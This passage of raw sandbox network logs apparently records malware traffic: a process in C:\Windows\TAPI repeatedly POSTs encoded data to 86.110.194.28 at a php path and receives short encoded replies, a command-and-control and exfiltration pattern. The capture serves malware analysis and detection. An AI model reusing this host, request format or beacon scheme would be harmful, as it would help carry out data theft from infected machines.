                                                                                                                                                                        Jan 3, 2025 07:58:39.902462006 CET2516OUTData Raw: 5e 50 5e 50 58 5d 50 5d 54 5b 59 5a 5b 50 57 59 5f 5d 5a 58 52 56 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^PX]P]T[YZ[PWY_]ZXRVPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&+\5/%,?*+%7=%%R 7)!;/')&?$(9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:40.234961987 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:40.363173962 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:40 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        62192.168.2.45002286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:40.408843040 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2108
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        63192.168.2.45002386.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:40.513061047 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:40.871166945 CET2516OUTData Raw: 5e 52 5e 5e 58 5f 50 5b 54 5b 59 5a 5b 54 57 5e 5f 56 5a 5e 52 5d 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^R^^X_P[T[YZ[TW^_VZ^R]PDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&B?5\!*,%Z,)*^$42<)R '"#8[0?&<?<)#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:41.214803934 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:41.349225044 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:41 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        64192.168.2.45002986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:41.490739107 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:41.839940071 CET2516OUTData Raw: 5b 50 5e 59 5d 5e 50 5d 54 5b 59 5a 5b 56 57 58 5f 53 5a 55 52 57 50 47 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P^Y]^P]T[YZ[VWX_SZURWPGZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%(>&!0&Z?>8>X04!]'?:!7*#$7',#?#Y'$X.%
                                                                                                                                                                        Jan 3, 2025 07:58:42.188611984 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:42.320246935 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:42 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        65192.168.2.45003586.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:42.456325054 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:42.808912039 CET2516OUTData Raw: 5e 51 5e 5a 5d 5d 50 50 54 5b 59 5a 5b 50 57 52 5f 51 5a 5c 52 53 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^Q^Z]]PPT[YZ[PWR_QZ\RSPHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+.2!)?%8*6Y$.%,)"-#(+');$,/))#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:43.163222075 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:43.293976068 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:43 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        66192.168.2.45004686.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:43.424702883 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:43.777504921 CET2516OUTData Raw: 5b 56 5b 5d 58 59 55 5c 54 5b 59 5a 5b 53 57 52 5f 5d 5a 59 52 52 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [V[]XYU\T[YZ[SWR_]ZYRRPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D<.)_"8V2??>;$7=Z2,*"% +,0E'/T?#Y'$X.1
                                                                                                                                                                        Jan 3, 2025 07:58:44.139565945 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:44.270620108 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:44 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        67192.168.2.45005286.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:44.412421942 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:44.761809111 CET2516OUTData Raw: 5e 50 5e 5d 58 57 50 5b 54 5b 59 5a 5b 54 57 5a 5f 50 5a 5d 52 5c 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: ^P^]XWP[T[YZ[TWZ_PZ]R\PHZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E(>1_!:<V&0>>0*&/)V6=P!++'<D'<$V+#Y'$X.-
                                                                                                                                                                        Jan 3, 2025 07:58:45.090997934 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:45.222769022 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:44 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        68192.168.2.45005886.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:45.374135971 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        69192.168.2.45005986.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:45.548806906 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2092
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:45.902426004 CET2092OUTData Raw: 5b 51 5b 5b 58 56 50 50 54 5b 59 5a 5b 57 57 53 5f 5c 5a 59 52 55 50 46 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [Q[[XVPPT[YZ[WWS_\ZYRUPFZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%)>"*(T$<;>8.3Z1:"B=7$),D'/8<)#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:46.244508028 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:46.376009941 CET380INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:46 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 0d 1d 24 5c 26 15 25 03 29 01 0e 02 25 33 0f 5a 35 56 38 17 3b 33 29 1a 35 3c 2a 06 32 05 0e 13 3f 3d 2e 43 29 30 3d 12 23 3e 0f 1d 29 20 28 5d 03 10 3a 02 28 2e 33 12 29 3d 31 1b 2c 34 2c 05 33 09 38 1f 2a 33 0b 13 31 3c 2d 0f 21 3d 3b 1f 2a 1d 2a 07 33 28 2c 16 2a 30 0a 02 27 07 20 54 0b 17 27 54 30 0e 0e 00 25 5e 3a 03 2a 37 1a 5c 24 2a 2d 1a 22 12 32 50 37 00 20 5f 2f 1e 29 1e 30 2b 3a 0a 3e 3e 3f 54 32 5c 32 5c 24 3b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                        Data Ascii: $\&%)%3Z5V8;3)5<*2?=.C)0=#>) (]:(.3)=1,4,38*31<-!=;**3(,*0' T'T0%^:*7\$*-"2P7 _/)0+:>>?T2\2\$;.\#(U4WP


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        70192.168.2.45006486.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:45.683199883 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:46.027565002 CET2516OUTData Raw: 5b 50 5b 5d 5d 5b 50 59 54 5b 59 5a 5b 52 57 5a 5f 5d 5a 59 52 53 50 43 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [P[]][PYT[YZ[RWZ_]ZYRSPCZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%+>%\!81<+);.[0$5[1Y!Q 4=!(707'/<)#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:46.394089937 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:46.528292894 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:46 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        71192.168.2.45007186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:46.687335014 CET304OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Jan 3, 2025 07:58:47.043066025 CET2516OUTData Raw: 5b 53 5b 5a 58 58 55 5d 54 5b 59 5a 5b 52 57 5a 5f 5d 5a 5a 52 56 50 49 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S[ZXXU]T[YZ[RWZ_]ZZRVPIZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&D?!%Z<D>Y3$)&=Q5 ;+%*<''?#Y'$X.5
                                                                                                                                                                        Jan 3, 2025 07:58:47.371433020 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:47.500478029 CET151INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:47 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        72192.168.2.45007786.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:47.802077055 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:48.152678967 CET2516OUTData Raw: 5b 53 5b 5c 5d 5a 55 5c 54 5b 59 5a 5b 5e 57 5f 5f 5c 5a 5a 52 54 50 45 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [S[\]ZU\T[YZ[^W__\ZZRTPEZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y&E)=2"*T%Z8C=>Z'2?S55 ($*7' W+9#Y'$X.
                                                                                                                                                                        Jan 3, 2025 07:58:48.507107973 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:48.636522055 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:48 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        73192.168.2.45008086.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:48.802850962 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:49.152419090 CET2516OUTData Raw: 5b 56 5b 5c 5d 59 55 58 54 5b 59 5a 5b 51 57 59 5f 51 5a 5a 52 54 50 44 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
                                                                                                                                                                        Data Ascii: [V[\]YUXT[YZ[QWY_QZZRTPDZY_^[ZZ]DXQBPV[P]_[SUVWXPXC\DXUQT_SXPV\]YV^QWR[T^Y\PYXY^QV[_ZZ__SUUYYVZQ]ZXVZWY[[Y_QTWBQZ_[PZ]TV^\^^QU_PY[_WWXU^]\Q]_ZTZYQQ\XYT_^\\U\_ZTBRC[S__RUZPZ_\U_Z_XWX[]Y%<5_6*V&/,);='B52)S"4%P!;,Y%:73?<T)9#Y'$X.9
                                                                                                                                                                        Jan 3, 2025 07:58:49.488034964 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                        Jan 3, 2025 07:58:49.624397993 CET207INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Fri, 03 Jan 2025 06:58:49 GMT
                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                        Content-Length: 4
                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Data Raw: 3f 55 5d 54
                                                                                                                                                                        Data Ascii: ?U]T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        74192.168.2.45008186.110.194.28803300C:\Windows\TAPI\ZWgKQlTqcrSB.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Jan 3, 2025 07:58:49.750730991 CET328OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                                                        Host: 86.110.194.28
                                                                                                                                                                        Content-Length: 2516
                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Jan 3, 2025 07:58:50.105673075 CET2516OUTData Raw: 5b 54 5e 5e 5d 5c 50 5d 54 5b 59 5a 5b 52 57 5b 5f 52 5a 59 52 56 50 48 5a 59 5f 5e 5b 5a 5a 5d 44 58 51 42 50 56 5b 50 5d 5f 5b 53 55 56 57 58 50 58 43 5c 44 58 55 51 54 5f 53 58 50 56 5c 5d 59 56 5e 51 57 52 5b 54 5e 59 5c 50 59 58 59 5e 51 56
